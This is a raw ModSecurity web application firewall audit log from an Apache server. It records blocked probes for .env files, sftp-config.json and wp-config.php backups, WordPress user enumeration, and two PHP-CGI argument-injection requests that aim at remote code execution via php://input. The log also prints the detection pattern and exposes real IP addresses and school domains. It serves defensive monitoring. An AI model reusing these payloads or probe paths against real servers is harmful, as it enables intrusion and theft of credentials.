[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746380808108366 742 (- - -) Stopwatch2: 1746380808108366 742; combined=312, p1=276, p2=0, p3=0, p4=0, p5=36, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74e5b82b-Z-- --986f1177-A-- [05/May/2025:01:33:04 +0700] aBey4GJEE9ao5dcyYWn7MQAAAJQ 103.236.140.4 46308 103.236.140.4 8181 --986f1177-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --986f1177-C-- --986f1177-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --986f1177-E-- --986f1177-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746383584845248 3908 (- - -) Stopwatch2: 1746383584845248 3908; combined=2097, p1=511, p2=1551, p3=0, p4=0, p5=35, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --986f1177-Z-- --c4a1f63a-A-- [05/May/2025:01:35:31 +0700] aBezc-chPF6irSergtsIxwAAANU 103.236.140.4 46558 103.236.140.4 8181 --c4a1f63a-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 146.190.103.103 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c4a1f63a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4a1f63a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746383731144155 581 (- - -) Stopwatch2: 1746383731144155 581; combined=221, p1=200, p2=0, p3=0, p4=0, p5=21, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4a1f63a-Z-- --296a367f-A-- [05/May/2025:02:54:23 +0700] aBfF79sVQyl9V2B8Pt_GEgAAAFY 103.236.140.4 47440 103.236.140.4 8181 --296a367f-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.23.218.208 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.23.218.208 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --296a367f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --296a367f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746388463963502 814 (- - -) Stopwatch2: 1746388463963502 814; combined=319, p1=283, p2=0, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --296a367f-Z-- --cda3f03f-A-- [05/May/2025:04:38:00 +0700] aBfeOE2V_h1VFAgsfga9LgAAAAk 103.236.140.4 50920 103.236.140.4 8181 --cda3f03f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --cda3f03f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cda3f03f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746394680957788 870 (- - -) Stopwatch2: 1746394680957788 870; combined=321, p1=282, p2=0, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda3f03f-Z-- --6a9da451-A-- [05/May/2025:05:10:21 +0700] aBflzQRwKNFSM6B7_LYOowAAAJg 103.236.140.4 36310 103.236.140.4 8181 --6a9da451-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.181.11.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.181.11.123 X-Forwarded-Proto: https Connection: close --6a9da451-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a9da451-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746396621050443 859 (- - -) Stopwatch2: 1746396621050443 859; combined=305, p1=262, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a9da451-Z-- --1b4de616-A-- [05/May/2025:05:24:18 +0700] aBfpEvZJDMuQndL03JOzAwAAAFI 103.236.140.4 36388 103.236.140.4 8181 --1b4de616-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.189.53 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.189.53 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1b4de616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b4de616-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746397458622255 877 (- - -) Stopwatch2: 1746397458622255 877; combined=378, p1=337, p2=0, p3=0, p4=0, p5=40, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b4de616-Z-- --4814d870-A-- [05/May/2025:06:04:29 +0700] aBfyfYZWvR7-42f6JrBtSgAAAMM 103.236.140.4 40244 103.236.140.4 8181 --4814d870-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 109.123.238.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.123.238.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --4814d870-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4814d870-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746399869801553 931 (- - -) Stopwatch2: 1746399869801553 931; combined=325, p1=285, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4814d870-Z-- --639aa571-A-- [05/May/2025:09:12:43 +0700] aBgem_ZJDMuQndL03JO0_AAAAEg 103.236.140.4 43766 103.236.140.4 8181 --639aa571-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.186.245 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* Cookie: X-Forwarded-For: 188.166.186.245 Accept-Encoding: gzip X-Varnish: 137443420 --639aa571-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --639aa571-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746411163438641 935 (- - -) Stopwatch2: 1746411163438641 935; combined=395, p1=356, p2=0, p3=0, p4=0, p5=38, sr=141, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --639aa571-Z-- --e6c3331f-A-- [05/May/2025:09:15:09 +0700] aBgfLfZJDMuQndL03JO0_wAAAFc 103.236.140.4 43792 103.236.140.4 8181 --e6c3331f-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --e6c3331f-C-- --e6c3331f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6c3331f-E-- --e6c3331f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746411309617313 3555 (- - -) Stopwatch2: 1746411309617313 3555; combined=2021, p1=460, p2=1525, p3=0, p4=0, p5=36, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6c3331f-Z-- --c297a32e-A-- [05/May/2025:12:26:09 +0700] aBhL8YZWvR7-42f6JrB3JwAAANg 103.236.140.4 51224 103.236.140.4 8181 --c297a32e-B-- GET /wp-config.php.maj HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.235.146.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.235.146.29 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --c297a32e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c297a32e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422769426021 938 (- - -) Stopwatch2: 1746422769426021 938; combined=370, p1=317, p2=0, p3=0, p4=0, p5=53, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c297a32e-Z-- --10d4c279-A-- [05/May/2025:12:26:09 +0700] aBhL8fZJDMuQndL03JO_CQAAAFc 103.236.140.4 51230 103.236.140.4 8181 --10d4c279-B-- GET /wp-config.php.save HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.235.146.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.235.146.29 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --10d4c279-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10d4c279-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422769950756 884 (- - -) Stopwatch2: 1746422769950756 884; combined=301, p1=266, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10d4c279-Z-- --2f094f7e-A-- [05/May/2025:12:26:11 +0700] aBhL84ZWvR7-42f6JrB3KAAAAMA 103.236.140.4 51248 103.236.140.4 8181 --2f094f7e-B-- GET /wp-config.old.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.235.146.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.235.146.29 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --2f094f7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f094f7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422771008036 819 (- - -) Stopwatch2: 1746422771008036 819; combined=331, p1=292, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f094f7e-Z-- --e9253339-A-- [05/May/2025:12:26:18 +0700] aBhL-oZWvR7-42f6JrB3PwAAAMo 103.236.140.4 51442 103.236.140.4 8181 --e9253339-B-- GET /wp-config.php.CloudTech_bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.56.83.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.56.83.83 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --e9253339-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9253339-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422778969237 669 (- - -) Stopwatch2: 1746422778969237 669; combined=262, p1=228, p2=0, p3=0, p4=0, p5=34, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9253339-Z-- --7018aa38-A-- [05/May/2025:12:26:21 +0700] aBhL_U2V_h1VFAgsfgbOxQAAABI 103.236.140.4 51528 103.236.140.4 8181 --7018aa38-B-- GET /wp-config.php__ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --7018aa38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7018aa38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422781092485 833 (- - -) Stopwatch2: 1746422781092485 833; combined=338, p1=297, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7018aa38-Z-- --e4d05e22-A-- [05/May/2025:12:26:23 +0700] aBhL_02V_h1VFAgsfgbOzgAAAAg 103.236.140.4 51582 103.236.140.4 8181 --e4d05e22-B-- GET /wp-config.php-work HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --e4d05e22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4d05e22-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422783831049 800 (- - -) Stopwatch2: 1746422783831049 800; combined=328, p1=288, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4d05e22-Z-- --feea823a-A-- [05/May/2025:12:26:26 +0700] aBhMAvZJDMuQndL03JO_HgAAAE4 103.236.140.4 51616 103.236.140.4 8181 --feea823a-B-- GET /wp-config.php______ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.25 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --feea823a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --feea823a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746422786179177 875 (- - -) Stopwatch2: 1746422786179177 875; combined=338, p1=297, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --feea823a-Z-- --fe08ca07-A-- [05/May/2025:13:15:21 +0700] aBhXefZJDMuQndL03JPULgAAAEQ 103.236.140.4 52266 103.236.140.4 8181 --fe08ca07-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.189.53 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.189.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --fe08ca07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe08ca07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746425721539921 748 (- - -) Stopwatch2: 1746425721539921 748; combined=293, p1=256, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe08ca07-Z-- --7f7aa453-A-- [05/May/2025:13:26:00 +0700] aBhZ-IZWvR7-42f6JrCRxQAAAMk 103.236.140.4 42882 103.236.140.4 8181 --7f7aa453-B-- GET /sftp-config.json HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 15.237.179.14 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 15.237.179.14 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --7f7aa453-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f7aa453-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746426360787363 965 (- - -) Stopwatch2: 1746426360787363 965; combined=362, p1=321, p2=0, p3=0, p4=0, p5=41, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f7aa453-Z-- --79ec6a34-A-- [05/May/2025:16:16:37 +0700] aBiB9YZWvR7-42f6JrDXggAAANE 103.236.140.4 42392 103.236.140.4 8181 --79ec6a34-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --79ec6a34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 